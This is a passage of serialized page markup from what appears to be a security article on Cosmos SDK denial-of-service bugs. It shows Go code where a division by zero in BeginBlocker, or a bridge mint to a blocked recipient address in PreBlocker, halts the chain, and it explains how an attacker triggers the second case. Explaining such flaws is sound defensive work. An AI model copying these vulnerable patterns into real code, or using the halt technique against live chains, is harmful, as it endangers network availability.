",{"type":27,"tag":207,"props":88353,"children":88354},{"style":8920},[88355],{"type":33,"value":83546},{"type":27,"tag":207,"props":88357,"children":88358},{"style":238},[88359],{"type":33,"value":2222},{"type":27,"tag":207,"props":88361,"children":88362},{"style":1335},[88363],{"type":33,"value":88364},"AllocateReward",{"type":27,"tag":207,"props":88366,"children":88367},{"style":238},[88368],{"type":33,"value":9090},{"type":27,"tag":207,"props":88370,"children":88371},{"class":209,"line":244},[88372,88376,88380,88384,88388],{"type":27,"tag":207,"props":88373,"children":88374},{"style":220},[88375],{"type":33,"value":83567},{"type":27,"tag":207,"props":88377,"children":88378},{"style":8920},[88379],{"type":33,"value":83572},{"type":27,"tag":207,"props":88381,"children":88382},{"style":238},[88383],{"type":33,"value":1041},{"type":27,"tag":207,"props":88385,"children":88386},{"style":8920},[88387],{"type":33,"value":83581},{"type":27,"tag":207,"props":88389,"children":88390},{"style":238},[88391],{"type":33,"value":1842},{"type":27,"tag":207,"props":88393,"children":88394},{"class":209,"line":270},[88395,88399,88403,88407,88411,88416],{"type":27,"tag":207,"props":88396,"children":88397},{"style":220},[88398],{"type":33,"value":83593},{"type":27,"tag":207,"props":88400,"children":88401},{"style":226},[88402],{"type":33,"value":17093},{"type":27,"tag":207,"props":88404,"children":88405},{"style":8920},[88406],{"type":33,"value":13042},{"type":27,"tag":207,"props":88408,"children":88409},{"style":238},[88410],{"type":33,"value":1041},{"type":27,"tag":207,"props":88412,"children":88413},{"style":8920},[88414],{"type":33,"value":88415},"MsgAllocateReward",{"type":27,"tag":207,"props":88417,"children":88418},{"style":238},[88419],{"type":33,"value":10449},{"type":27,"tag":207,"props":88421,"children":88422},{"class":209,"line":296},[88423,88427,88431,88435,88439,88444,88448,88452],{"type":27,"tag":207,"props":88424,"children":88425},{"style":238},[88426],{"type":33,"value":1343},{"type":27,"tag":207,"props":88428,"children":88429},{"style":226},[88430],{"type":33,"value":9286},{"type":27,"tag":207,"props":88432,"children":88433},{"style":8920},[88434],{"type":33,"value":13042},{"type":27,"tag":207,"props":88436,"children":88437},{"style":238},[88438],{"type":33,"value":1041},{"type":27,"tag":207,"props":88440,"children":88441},{"style":8920},[88442],{"type":33,"value":88443},"MsgAllocatRewardResponse",{"type":27,"tag":207,"props":88445,"children":88446},{"style":238},[88447],{"type":33,"value":1123},{"type":27,"tag":207,"props":88449,"children":88450},{"style":8920},[88451],{"type":33,"value":22138},{"type":27,"tag":207,"props":88453,"children":88454},{"style":238},[88455],{"type":33,"value":1424},{"type":27,"tag":207,"props":88457,"children":88458},{"class":209,"line":445},[88459],{"type":27,"tag":207,"props":88460,"children":88461},{"emptyLinePlaceholder":19},[88462],{"type":33,"value":2062},{"type":27,"tag":207,"props":88464,"children":88465},{"class":209,"line":867},[88466,88471,88475,88480,88484,88489,88493,88498,88502,88506,88511,88515,88519,88523,88528],{"type":27,"tag":207,"props":88467,"children":88468},{"style":220},[88469],{"type":33,"value":88470}," RewardPerShare",{"type":27,"tag":207,"props":88472,"children":88473},{"style":226},[88474],{"type":33,"value":83648},{"type":27,"tag":207,"props":88476,"children":88477},{"style":220},[88478],{"type":33,"value":88479}," k",{"type":27,"tag":207,"props":88481,"children":88482},{"style":238},[88483],{"type":33,"value":1041},{"type":27,"tag":207,"props":88485,"children":88486},{"style":220},[88487],{"type":33,"value":88488},"keeper",{"type":27,"tag":207,"props":88490,"children":88491},{"style":238},[88492],{"type":33,"value":1041},{"type":27,"tag":207,"props":88494,"children":88495},{"style":1335},[88496],{"type":33,"value":88497},"Shares",{"type":27,"tag":207,"props":88499,"children":88500},{"style":238},[88501],{"type":33,"value":21319},{"type":27,"tag":207,"props":88503,"children":88504},{"style":226},[88505],{"type":33,"value":980},{"type":27,"tag":207,"props":88507,"children":88508},{"style":220},[88509],{"type":33,"value":88510}," k",{"type":27,"tag":207,"props":88512,"children":88513},{"style":238},[88514],{"type":33,"value":1041},{"type":27,"tag":207,"props":88516,"children":88517},{"style":220},[88518],{"type":33,"value":88488},{"type":27,"tag":207,"props":88520,"children":88521},{"style":238},[88522],{"type":33,"value":1041},{"type":27,"tag":207,"props":88524,"children":88525},{"style":1335},[88526],{"type":33,"value":88527},"TotalReward",{"type":27,"tag":207,"props":88529,"children":88530},{"style":238},[88531],{"type":33,"value":15018},{"type":27,"tag":207,"props":88533,"children":88534},{"class":209,"line":892},[88535,88540,88544,88548,88552,88557,88561,88566],{"type":27,"tag":207,"props":88536,"children":88537},{"style":220},[88538],{"type":33,"value":88539}," k",{"type":27,"tag":207,"props":88541,"children":88542},{"style":238},[88543],{"type":33,"value":1041},{"type":27,"tag":207,"props":88545,"children":88546},{"style":220},[88547],{"type":33,"value":88488},{"type":27,"tag":207,"props":88549,"children":88550},{"style":238},[88551],{"type":33,"value":1041},{"type":27,"tag":207,"props":88553,"children":88554},{"style":1335},[88555],{"type":33,"value":88556},"DistributeReward",{"type":27,"tag":207,"props":88558,"children":88559},{"style":238},[88560],{"type":33,"value":1343},{"type":27,"tag":207,"props":88562,"children":88563},{"style":220},[88564],{"type":33,"value":88565},"RewardPerShare",{"type":27,"tag":207,"props":88567,"children":88568},{"style":238},[88569],{"type":33,"value":10449},{"type":27,"tag":207,"props":88571,"children":88572},{"class":209,"line":1475},[88573],{"type":27,"tag":207,"props":88574,"children":88575},{"emptyLinePlaceholder":19},[88576],{"type":33,"value":2062},{"type":27,"tag":207,"props":88578,"children":88579},{"class":209,"line":2065},[88580,88584,88588,88592,88596,88601,88605],{"type":27,"tag":207,"props":88581,"children":88582},{"style":376},[88583],{"type":33,"value":8986},{"type":27,"tag":207,"props":88585,"children":88586},{"style":226},[88587],{"type":33,"value":14423},{"type":27,"tag":207,"props":88589,"children":88590},{"style":220},[88591],{"type":33,"value":13042},{"type":27,"tag":207,"props":88593,"children":88594},{"style":238},[88595],{"type":33,"value":1041},{"type":27,"tag":207,"props":88597,"children":88598},{"style":220},[88599],{"type":33,"value":88600},"MsgAllocateRewardResponse",{"type":27,"tag":207,"props":88602,"children":88603},{"style":238},[88604],{"type":33,"value":1123},{"type":27,"tag":207,"props":88606,"children":88607},{"style":214},[88608],{"type":33,"value":83873},{"type":27,"tag":207,"props":88610,"children":88611},{"class":209,"line":2092},[88612],{"type":27,"tag":207,"props":88613,"children":88614},{"style":238},[88615],{"type":33,"value":451},{"type":27,"tag":36,"props":88617,"children":88618},{},[88619,88621,88627,88628,88634,88635,88641,88643,88648],{"type":33,"value":88620},"However, the same assumption does not always hold. Certain parts of Cosmos, such as ",{"type":27,"tag":84,"props":88622,"children":88624},{"className":88623},[],[88625],{"type":33,"value":88626},"PreBlocker",{"type":33,"value":1123},{"type":27,"tag":84,"props":88629,"children":88631},{"className":88630},[],[88632],{"type":33,"value":88633},"BeginBlocker",{"type":33,"value":4601},{"type":27,"tag":84,"props":88636,"children":88638},{"className":88637},[],[88639],{"type":33,"value":88640},"EndBlocker",{"type":33,"value":88642},", are not protected by the error handling mechanism. So, if we move the reward distribution logic into ",{"type":27,"tag":84,"props":88644,"children":88646},{"className":88645},[],[88647],{"type":33,"value":88633},{"type":33,"value":88649}," to automatically distribute rewards at the start of each block, panics raised by division by 0 will halt the chain.",{"type":27,"tag":101,"props":88651,"children":88653},{"code":88652,"language":83397,"meta":7,"className":83398,"style":7},"func BeginBlocker(ctx context.Context, keeper keeper.Keeper) error {\n\n RewardPerShare := keeper.Shares() / keeper.TotalReward()\n keeper.DistributeReward(RewardPerShare)\n\n return nil\n}\n",[88654],{"type":27,"tag":84,"props":88655,"children":88656},{"__ignoreMap":7},[88657,88722,88729,88777,88805,88812,88824],{"type":27,"tag":207,"props":88658,"children":88659},{"class":209,"line":210},[88660,88664,88669,88673,88677,88681,88685,88689,88693,88697,88702,88706,88710,88714,88718],{"type":27,"tag":207,"props":88661,"children":88662},{"style":214},[88663],{"type":33,"value":2085},{"type":27,"tag":207,"props":88665,"children":88666},{"style":1335},[88667],{"type":33,"value":88668}," BeginBlocker",{"type":27,"tag":207,"props":88670,"children":88671},{"style":238},[88672],{"type":33,"value":1343},{"type":27,"tag":207,"props":88674,"children":88675},{"style":220},[88676],{"type":33,"value":27552},{"type":27,"tag":207,"props":88678,"children":88679},{"style":8920},[88680],{"type":33,"value":83572},{"type":27,"tag":207,"props":88682,"children":88683},{"style":238},[88684],{"type":33,"value":1041},{"type":27,"tag":207,"props":88686,"children":88687},{"style":8920},[88688],{"type":33,"value":83581},{"type":27,"tag":207,"props":88690,"children":88691},{"style":238},[88692],{"type":33,"value":1123},{"type":27,"tag":207,"props":88694,"children":88695},{"style":220},[88696],{"type":33,"value":88488},{"type":27,"tag":207,"props":88698,"children":88699},{"style":8920},[88700],{"type":33,"value":88701}," keeper",{"type":27,"tag":207,"props":88703,"children":88704},{"style":238},[88705],{"type":33,"value":1041},{"type":27,"tag":207,"props":88707,"children":88708},{"style":8920},[88709],{"type":33,"value":87176},{"type":27,"tag":207,"props":88711,"children":88712},{"style":238},[88713],{"type":33,"value":2222},{"type":27,"tag":207,"props":88715,"children":88716},{"style":8920},[88717],{"type":33,"value":22138},{"type":27,"tag":207,"props":88719,"children":88720},{"style":238},[88721],{"type":33,"value":384},{"type":27,"tag":207,"props":88723,"children":88724},{"class":209,"line":244},[88725],{"type":27,"tag":207,"props":88726,"children":88727},{"emptyLinePlaceholder":19},[88728],{"type":33,"value":2062},{"type":27,"tag":207,"props":88730,"children":88731},{"class":209,"line":270},[88732,88736,88740,88744,88748,88752,88756,88760,88765,88769,88773],{"type":27,"tag":207,"props":88733,"children":88734},{"style":220},[88735],{"type":33,"value":88470},{"type":27,"tag":207,"props":88737,"children":88738},{"style":226},[88739],{"type":33,"value":83648},{"type":27,"tag":207,"props":88741,"children":88742},{"style":220},[88743],{"type":33,"value":88701},{"type":27,"tag":207,"props":88745,"children":88746},{"style":238},[88747],{"type":33,"value":1041},{"type":27,"tag":207,"props":88749,"children":88750},{"style":1335},[88751],{"type":33,"value":88497},{"type":27,"tag":207,"props":88753,"children":88754},{"style":238},[88755],{"type":33,"value":21319},{"type":27,"tag":207,"props":88757,"children":88758},{"style":226},[88759],{"type":33,"value":980},{"type":27,"tag":207,"props":88761,"children":88762},{"style":220},[88763],{"type":33,"value":88764}," keeper",{"type":27,"tag":207,"props":88766,"children":88767},{"style":238},[88768],{"type":33,"value":1041},{"type":27,"tag":207,"props":88770,"children":88771},{"style":1335},[88772],{"type":33,"value":88527},{"type":27,"tag":207,"props":88774,"children":88775},{"style":238},[88776],{"type":33,"value":15018},{"type":27,"tag":207,"props":88778,"children":88779},{"class":209,"line":296},[88780,88785,88789,88793,88797,88801],{"type":27,"tag":207,"props":88781,"children":88782},{"style":220},[88783],{"type":33,"value":88784}," keeper",{"type":27,"tag":207,"props":88786,"children":88787},{"style":238},[88788],{"type":33,"value":1041},{"type":27,"tag":207,"props":88790,"children":88791},{"style":1335},[88792],{"type":33,"value":88556},{"type":27,"tag":207,"props":88794,"children":88795},{"style":238},[88796],{"type":33,"value":1343},{"type":27,"tag":207,"props":88798,"children":88799},{"style":220},[88800],{"type":33,"value":88565},{"type":27,"tag":207,"props":88802,"children":88803},{"style":238},[88804],{"type":33,"value":10449},{"type":27,"tag":207,"props":88806,"children":88807},{"class":209,"line":445},[88808],{"type":27,"tag":207,"props":88809,"children":88810},{"emptyLinePlaceholder":19},[88811],{"type":33,"value":2062},{"type":27,"tag":207,"props":88813,"children":88814},{"class":209,"line":867},[88815,88819],{"type":27,"tag":207,"props":88816,"children":88817},{"style":376},[88818],{"type":33,"value":60102},{"type":27,"tag":207,"props":88820,"children":88821},{"style":214},[88822],{"type":33,"value":88823}," nil\n",{"type":27,"tag":207,"props":88825,"children":88826},{"class":209,"line":892},[88827],{"type":27,"tag":207,"props":88828,"children":88829},{"style":238},[88830],{"type":33,"value":451},{"type":27,"tag":58,"props":88832,"children":88834},{"id":88833},"real-world-examples-3",[88835],{"type":33,"value":83920},{"type":27,"tag":36,"props":88837,"children":88838},{},[88839],{"type":33,"value":88840},"Recently, developers have become increasingly aware of unprotected ABCI functions, but this doesn't stop DoS bugs from manifesting. So what is the catch?",{"type":27,"tag":36,"props":88842,"children":88843},{},[88844,88846,88852,88854,88859,88861,88867,88869,88875,88877,88883],{"type":33,"value":88845},"The problem lies in the lack of proper understanding of utility functions. The example here implements a bridge that mints wrapped BTC tokens in the PreBlocker when bridging events are observed. Notably, errors returned by ",{"type":27,"tag":84,"props":88847,"children":88849},{"className":88848},[],[88850],{"type":33,"value":88851},"bankKeeper.SendCoinsFromModuleToAccount",{"type":33,"value":88853}," will be bubbled up through ",{"type":27,"tag":84,"props":88855,"children":88857},{"className":88856},[],[88858],{"type":33,"value":88626},{"type":33,"value":88860}," and halt the chain. It turns out an attacker can force ",{"type":27,"tag":84,"props":88862,"children":88864},{"className":88863},[],[88865],{"type":33,"value":88866},"SendCoinsFromModuleToAccount",{"type":33,"value":88868}," to return an error by setting ",{"type":27,"tag":84,"props":88870,"children":88872},{"className":88871},[],[88873],{"type":33,"value":88874},"recipient",{"type":33,"value":88876}," to some ",{"type":27,"tag":84,"props":88878,"children":88880},{"className":88879},[],[88881],{"type":33,"value":88882},"BlockedAddr",{"type":33,"value":88884},",rendering the code susceptible to DoS attacks.",{"type":27,"tag":36,"props":88886,"children":88887},{},[88888],{"type":27,"tag":47,"props":88889,"children":88892},{"href":88890,"rel":88891},"https://github.com/mezo-org/mezod/blob/d3b1a049a9acce977fdadd245cb381252f101922/x/bridge/keeper/assets_locked.go#L170",[51],[88893],{"type":33,"value":83970},{"type":27,"tag":101,"props":88895,"children":88897},{"code":88896,"language":83397,"meta":7,"className":83398,"style":7},"func (pbh *PreBlockHandler) PreBlocker() sdk.PreBlocker {\n return func(\n ctx sdk.Context,\n req *cmtabci.RequestFinalizeBlock,\n ) (*sdk.ResponsePreBlock, error) {\n ...\n err := pbh.bridgeKeeper.AcceptAssetsLocked(ctx, events)\n if err != nil {\n return nil, fmt.Errorf(\"cannot accept AssetsLocked events: %w\", err)\n }\n ...\n }\n}\n\nfunc (k Keeper) AcceptAssetsLocked(\n ctx sdk.Context,\n events types.AssetsLockedEvents,\n) error {\n ...\n for _, event := range events {\n recipient, err := sdk.AccAddressFromBech32(event.Recipient)\n if err != nil {\n return fmt.Errorf(\"failed to parse recipient address: %w\", err)\n }\n\n if bytes.Equal(event.TokenBytes(), sourceBTCToken) {\n err = k.mintBTC(ctx, recipient, event.Amount)\n if err != nil {\n return fmt.Errorf(\n \"failed to mint BTC for event %v: %w\",\n event.Sequence,\n err,\n )\n }\n } else {\n ...\n }\n }\n ...\n}\n\nfunc (k Keeper) mintBTC(\n ctx sdk.Context,\n recipient sdk.AccAddress,\n amount math.Int,\n) error {\n ...\n err = k.bankKeeper.SendCoinsFromModuleToAccount(\n ctx,\n types.ModuleName,\n recipient,\n coins,\n )\n if err != nil {\n return fmt.Errorf(\"failed to send coins: %w\", err)\n }\n ...\n}\n",[88898],{"type":27,"tag":84,"props":88899,"children":88900},{"__ignoreMap":7},[88901,88954,88969,88992,89022,89058,89066,89122,89146,89196,89203,89210,89217,89224,89231,89262,89285,89310,89325,89332,89369,89423,89446,89487,89494,89501,89552,89613,89636,89659,89671,89692,89704,89712,89719,89734,89742,89749,89756,89763,89770,89777,89808,89831,89856,89881,89896,89903,89940,89951,89972,89983,89995,90002,90025,90065,90072,90079],{"type":27,"tag":207,"props":88902,"children":88903},{"class":209,"line":210},[88904,88908,88912,88917,88921,88926,88930,88934,88938,88942,88946,88950],{"type":27,"tag":207,"props":88905,"children":88906},{"style":214},[88907],{"type":33,"value":2085},{"type":27,"tag":207,"props":88909,"children":88910},{"style":238},[88911],{"type":33,"value":686},{"type":27,"tag":207,"props":88913,"children":88914},{"style":220},[88915],{"type":33,"value":88916},"pbh ",{"type":27,"tag":207,"props":88918,"children":88919},{"style":226},[88920],{"type":33,"value":9286},{"type":27,"tag":207,"props":88922,"children":88923},{"style":8920},[88924],{"type":33,"value":88925},"PreBlockHandler",{"type":27,"tag":207,"props":88927,"children":88928},{"style":238},[88929],{"type":33,"value":2222},{"type":27,"tag":207,"props":88931,"children":88932},{"style":1335},[88933],{"type":33,"value":88626},{"type":27,"tag":207,"props":88935,"children":88936},{"style":238},[88937],{"type":33,"value":21319},{"type":27,"tag":207,"props":88939,"children":88940},{"style":8920},[88941],{"type":33,"value":85961},{"type":27,"tag":207,"props":88943,"children":88944},{"style":238},[88945],{"type":33,"value":1041},{"type":27,"tag":207,"props":88947,"children":88948},{"style":8920},[88949],{"type":33,"value":88626},{"type":27,"tag":207,"props":88951,"children":88952},{"style":238},[88953],{"type":33,"value":384},{"type":27,"tag":207,"props":88955,"children":88956},{"class":209,"line":244},[88957,88961,88965],{"type":27,"tag":207,"props":88958,"children":88959},{"style":376},[88960],{"type":33,"value":8986},{"type":27,"tag":207,"props":88962,"children":88963},{"style":214},[88964],{"type":33,"value":2024},{"type":27,"tag":207,"props":88966,"children":88967},{"style":238},[88968],{"type":33,"value":9090},{"type":27,"tag":207,"props":88970,"children":88971},{"class":209,"line":270},[88972,88976,88980,88984,88988],{"type":27,"tag":207,"props":88973,"children":88974},{"style":220},[88975],{"type":33,"value":33451},{"type":27,"tag":207,"props":88977,"children":88978},{"style":8920},[88979],{"type":33,"value":85872},{"type":27,"tag":207,"props":88981,"children":88982},{"style":238},[88983],{"type":33,"value":1041},{"type":27,"tag":207,"props":88985,"children":88986},{"style":8920},[88987],{"type":33,"value":83581},{"type":27,"tag":207,"props":88989,"children":88990},{"style":238},[88991],{"type":33,"value":1842},{"type":27,"tag":207,"props":88993,"children":88994},{"class":209,"line":296},[88995,89000,89004,89009,89013,89018],{"type":27,"tag":207,"props":88996,"children":88997},{"style":220},[88998],{"type":33,"value":88999}," req",{"type":27,"tag":207,"props":89001,"children":89002},{"style":226},[89003],{"type":33,"value":17093},{"type":27,"tag":207,"props":89005,"children":89006},{"style":8920},[89007],{"type":33,"value":89008},"cmtabci",{"type":27,"tag":207,"props":89010,"children":89011},{"style":238},[89012],{"type":33,"value":1041},{"type":27,"tag":207,"props":89014,"children":89015},{"style":8920},[89016],{"type":33,"value":89017},"RequestFinalizeBlock",{"type":27,"tag":207,"props":89019,"children":89020},{"style":238},[89021],{"type":33,"value":1842},{"type":27,"tag":207,"props":89023,"children":89024},{"class":209,"line":445},[89025,89029,89033,89037,89041,89046,89050,89054],{"type":27,"tag":207,"props":89026,"children":89027},{"style":238},[89028],{"type":33,"value":87307},{"type":27,"tag":207,"props":89030,"children":89031},{"style":226},[89032],{"type":33,"value":9286},{"type":27,"tag":207,"props":89034,"children":89035},{"style":8920},[89036],{"type":33,"value":85961},{"type":27,"tag":207,"props":89038,"children":89039},{"style":238},[89040],{"type":33,"value":1041},{"type":27,"tag":207,"props":89042,"children":89043},{"style":8920},[89044],{"type":33,"value":89045},"ResponsePreBlock",{"type":27,"tag":207,"props":89047,"children":89048},{"style":238},[89049],{"type":33,"value":1123},{"type":27,"tag":207,"props":89051,"children":89052},{"style":8920},[89053],{"type":33,"value":22138},{"type":27,"tag":207,"props":89055,"children":89056},{"style":238},[89057],{"type":33,"value":1424},{"type":27,"tag":207,"props":89059,"children":89060},{"class":209,"line":867},[89061],{"type":27,"tag":207,"props":89062,"children":89063},{"style":226},[89064],{"type":33,"value":89065}," ...\n",{"type":27,"tag":207,"props":89067,"children":89068},{"class":209,"line":892},[89069,89074,89078,89083,89087,89092,89096,89101,89105,89109,89113,89118],{"type":27,"tag":207,"props":89070,"children":89071},{"style":220},[89072],{"type":33,"value":89073}," err",{"type":27,"tag":207,"props":89075,"children":89076},{"style":226},[89077],{"type":33,"value":83648},{"type":27,"tag":207,"props":89079,"children":89080},{"style":220},[89081],{"type":33,"value":89082}," pbh",{"type":27,"tag":207,"props":89084,"children":89085},{"style":238},[89086],{"type":33,"value":1041},{"type":27,"tag":207,"props":89088,"children":89089},{"style":220},[89090],{"type":33,"value":89091},"bridgeKeeper",{"type":27,"tag":207,"props":89093,"children":89094},{"style":238},[89095],{"type":33,"value":1041},{"type":27,"tag":207,"props":89097,"children":89098},{"style":1335},[89099],{"type":33,"value":89100},"AcceptAssetsLocked",{"type":27,"tag":207,"props":89102,"children":89103},{"style":238},[89104],{"type":33,"value":1343},{"type":27,"tag":207,"props":89106,"children":89107},{"style":220},[89108],{"type":33,"value":27552},{"type":27,"tag":207,"props":89110,"children":89111},{"style":238},[89112],{"type":33,"value":1123},{"type":27,"tag":207,"props":89114,"children":89115},{"style":220},[89116],{"type":33,"value":89117},"events",{"type":27,"tag":207,"props":89119,"children":89120},{"style":238},[89121],{"type":33,"value":10449},{"type":27,"tag":207,"props":89123,"children":89124},{"class":209,"line":1475},[89125,89129,89133,89137,89142],{"type":27,"tag":207,"props":89126,"children":89127},{"style":376},[89128],{"type":33,"value":10562},{"type":27,"tag":207,"props":89130,"children":89131},{"style":220},[89132],{"type":33,"value":55760},{"type":27,"tag":207,"props":89134,"children":89135},{"style":226},[89136],{"type":33,"value":71619},{"type":27,"tag":207,"props":89138,"children":89139},{"style":214},[89140],{"type":33,"value":89141}," nil",{"type":27,"tag":207,"props":89143,"children":89144},{"style":238},[89145],{"type":33,"value":384},{"type":27,"tag":207,"props":89147,"children":89148},{"class":209,"line":2065},[89149,89153,89157,89161,89166,89170,89175,89179,89184,89188,89192],{"type":27,"tag":207,"props":89150,"children":89151},{"style":376},[89152],{"type":33,"value":86307},{"type":27,"tag":207,"props":89154,"children":89155},{"style":214},[89156],{"type":33,"value":89141},{"type":27,"tag":207,"props":89158,"children":89159},{"style":238},[89160],{"type":33,"value":1123},{"type":27,"tag":207,"props":89162,"children":89163},{"style":220},[89164],{"type":33,"value":89165},"fmt",{"type":27,"tag":207,"props":89167,"children":89168},{"style":238},[89169],{"type":33,"value":1041},{"type":27,"tag":207,"props":89171,"children":89172},{"style":1335},[89173],{"type":33,"value":89174},"Errorf",{"type":27,"tag":207,"props":89176,"children":89177},{"style":238},[89178],{"type":33,"value":1343},{"type":27,"tag":207,"props":89180,"children":89181},{"style":1325},[89182],{"type":33,"value":89183},"\"cannot accept AssetsLocked events: %w\"",{"type":27,"tag":207,"props":89185,"children":89186},{"style":238},[89187],{"type":33,"value":1123},{"type":27,"tag":207,"props":89189,"children":89190},{"style":220},[89191],{"type":33,"value":55659},{"type":27,"tag":207,"props":89193,"children":89194},{"style":238},[89195],{"type":33,"value":10449},{"type":27,"tag":207,"props":89197,"children":89198},{"class":209,"line":2092},[89199],{"type":27,"tag":207,"props":89200,"children":89201},{"style":238},[89202],{"type":33,"value":10637},{"type":27,"tag":207,"props":89204,"children":89205},{"class":209,"line":2130},[89206],{"type":27,"tag":207,"props":89207,"children":89208},{"style":226},[89209],{"type":33,"value":89065},{"type":27,"tag":207,"props":89211,"children":89212},{"class":209,"line":2168},[89213],{"type":27,"tag":207,"props":89214,"children":89215},{"style":238},[89216],{"type":33,"value":10645},{"type":27,"tag":207,"props":89218,"children":89219},{"class":209,"line":4095},[89220],{"type":27,"tag":207,"props":89221,"children":89222},{"style":238},[89223],{"type":33,"value":451},{"type":27,"tag":207,"props":89225,"children":89226},{"class":209,"line":4103},[89227],{"type":27,"tag":207,"props":89228,"children":89229},{"emptyLinePlaceholder":19},[89230],{"type":33,"value":2062},{"type":27,"tag":207,"props":89232,"children":89233},{"class":209,"line":4154},[89234,89238,89242,89246,89250,89254,89258],{"type":27,"tag":207,"props":89235,"children":89236},{"style":214},[89237],{"type":33,"value":2085},{"type":27,"tag":207,"props":89239,"children":89240},{"style":238},[89241],{"type":33,"value":686},{"type":27,"tag":207,"props":89243,"children":89244},{"style":220},[89245],{"type":33,"value":88351},{"type":27,"tag":207,"props":89247,"children":89248},{"style":8920},[89249],{"type":33,"value":87176},{"type":27,"tag":207,"props":89251,"children":89252},{"style":238},[89253],{"type":33,"value":2222},{"type":27,"tag":207,"props":89255,"children":89256},{"style":1335},[89257],{"type":33,"value":89100},{"type":27,"tag":207,"props":89259,"children":89260},{"style":238},[89261],{"type":33,"value":9090},{"type":27,"tag":207,"props":89263,"children":89264},{"class":209,"line":4203},[89265,89269,89273,89277,89281],{"type":27,"tag":207,"props":89266,"children":89267},{"style":220},[89268],{"type":33,"value":27495},{"type":27,"tag":207,"props":89270,"children":89271},{"style":8920},[89272],{"type":33,"value":85872},{"type":27,"tag":207,"props":89274,"children":89275},{"style":238},[89276],{"type":33,"value":1041},{"type":27,"tag":207,"props":89278,"children":89279},{"style":8920},[89280],{"type":33,"value":83581},{"type":27,"tag":207,"props":89282,"children":89283},{"style":238},[89284],{"type":33,"value":1842},{"type":27,"tag":207,"props":89286,"children":89287},{"class":209,"line":4249},[89288,89293,89297,89301,89306],{"type":27,"tag":207,"props":89289,"children":89290},{"style":220},[89291],{"type":33,"value":89292}," events",{"type":27,"tag":207,"props":89294,"children":89295},{"style":8920},[89296],{"type":33,"value":85406},{"type":27,"tag":207,"props":89298,"children":89299},{"style":238},[89300],{"type":33,"value":1041},{"type":27,"tag":207,"props":89302,"children":89303},{"style":8920},[89304],{"type":33,"value":89305},"AssetsLockedEvents",{"type":27,"tag":207,"props":89307,"children":89308},{"style":238},[89309],{"type":33,"value":1842},{"type":27,"tag":207,"props":89311,"children":89312},{"class":209,"line":4290},[89313,89317,89321],{"type":27,"tag":207,"props":89314,"children":89315},{"style":238},[89316],{"type":33,"value":2222},{"type":27,"tag":207,"props":89318,"children":89319},{"style":8920},[89320],{"type":33,"value":22138},{"type":27,"tag":207,"props":89322,"children":89323},{"style":238},[89324],{"type":33,"value":384},{"type":27,"tag":207,"props":89326,"children":89327},{"class":209,"line":4304},[89328],{"type":27,"tag":207,"props":89329,"children":89330},{"style":226},[89331],{"type":33,"value":27611},{"type":27,"tag":207,"props":89333,"children":89334},{"class":209,"line":5466},[89335,89339,89343,89347,89352,89356,89360,89365],{"type":27,"tag":207,"props":89336,"children":89337},{"style":376},[89338],{"type":33,"value":10321},{"type":27,"tag":207,"props":89340,"children":89341},{"style":220},[89342],{"type":33,"value":10326},{"type":27,"tag":207,"props":89344,"children":89345},{"style":238},[89346],{"type":33,"value":1123},{"type":27,"tag":207,"props":89348,"children":89349},{"style":220},[89350],{"type":33,"value":89351},"event",{"type":27,"tag":207,"props":89353,"children":89354},{"style":226},[89355],{"type":33,"value":83648},{"type":27,"tag":207,"props":89357,"children":89358},{"style":376},[89359],{"type":33,"value":84630},{"type":27,"tag":207,"props":89361,"children":89362},{"style":220},[89363],{"type":33,"value":89364}," events",{"type":27,"tag":207,"props":89366,"children":89367},{"style":238},[89368],{"type":33,"value":384},{"type":27,"tag":207,"props":89370,"children":89371},{"class":209,"line":5530},[89372,89377,89381,89385,89389,89393,89397,89402,89406,89410,89414,89419],{"type":27,"tag":207,"props":89373,"children":89374},{"style":220},[89375],{"type":33,"value":89376}," recipient",{"type":27,"tag":207,"props":89378,"children":89379},{"style":238},[89380],{"type":33,"value":1123},{"type":27,"tag":207,"props":89382,"children":89383},{"style":220},[89384],{"type":33,"value":55659},{"type":27,"tag":207,"props":89386,"children":89387},{"style":226},[89388],{"type":33,"value":83648},{"type":27,"tag":207,"props":89390,"children":89391},{"style":220},[89392],{"type":33,"value":85872},{"type":27,"tag":207,"props":89394,"children":89395},{"style":238},[89396],{"type":33,"value":1041},{"type":27,"tag":207,"props":89398,"children":89399},{"style":1335},[89400],{"type":33,"value":89401},"AccAddressFromBech32",{"type":27,"tag":207,"props":89403,"children":89404},{"style":238},[89405],{"type":33,"value":1343},{"type":27,"tag":207,"props":89407,"children":89408},{"style":220},[89409],{"type":33,"value":89351},{"type":27,"tag":207,"props":89411,"children":89412},{"style":238},[89413],{"type":33,"value":1041},{"type":27,"tag":207,"props":89415,"children":89416},{"style":220},[89417],{"type":33,"value":89418},"Recipient",{"type":27,"tag":207,"props":89420,"children":89421},{"style":238},[89422],{"type":33,"value":10449},{"type":27,"tag":207,"props":89424,"children":89425},{"class":209,"line":7900},[89426,89430,89434,89438,89442],{"type":27,"tag":207,"props":89427,"children":89428},{"style":376},[89429],{"type":33,"value":10562},{"type":27,"tag":207,"props":89431,"children":89432},{"style":220},[89433],{"type":33,"value":55760},{"type":27,"tag":207,"props":89435,"children":89436},{"style":226},[89437],{"type":33,"value":71619},{"type":27,"tag":207,"props":89439,"children":89440},{"style":214},[89441],{"type":33,"value":89141},{"type":27,"tag":207,"props":89443,"children":89444},{"style":238},[89445],{"type":33,"value":384},{"type":27,"tag":207,"props":89447,"children":89448},{"class":209,"line":7909},[89449,89453,89458,89462,89466,89470,89475,89479,89483],{"type":27,"tag":207,"props":89450,"children":89451},{"style":376},[89452],{"type":33,"value":86307},{"type":27,"tag":207,"props":89454,"children":89455},{"style":220},[89456],{"type":33,"value":89457}," fmt",{"type":27,"tag":207,"props":89459,"children":89460},{"style":238},[89461],{"type":33,"value":1041},{"type":27,"tag":207,"props":89463,"children":89464},{"style":1335},[89465],{"type":33,"value":89174},{"type":27,"tag":207,"props":89467,"children":89468},{"style":238},[89469],{"type":33,"value":1343},{"type":27,"tag":207,"props":89471,"children":89472},{"style":1325},[89473],{"type":33,"value":89474},"\"failed to parse recipient address: 